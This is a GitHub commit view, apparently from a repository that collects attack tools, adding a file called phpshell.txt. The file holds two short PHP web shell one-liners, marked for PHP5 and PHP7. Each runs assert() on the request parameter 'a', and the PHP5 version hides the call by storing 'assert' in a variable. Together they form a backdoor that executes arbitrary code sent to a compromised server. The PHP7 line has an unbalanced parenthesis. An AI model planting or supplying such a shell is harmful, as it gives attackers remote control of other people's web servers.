We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
1 parent a188074 commit c8360d3Copy full SHA for c8360d3
1 file changed
phpshell.txt
@@ -0,0 +1,9 @@
1
+//php5
2
+<?php
3
+$a='assert';
4
+[""=>$a($_REQUEST['a'])];
5
+?>
6
+//php7
7
8
+'assert'($_REQUEST['a']));
9
0 commit comments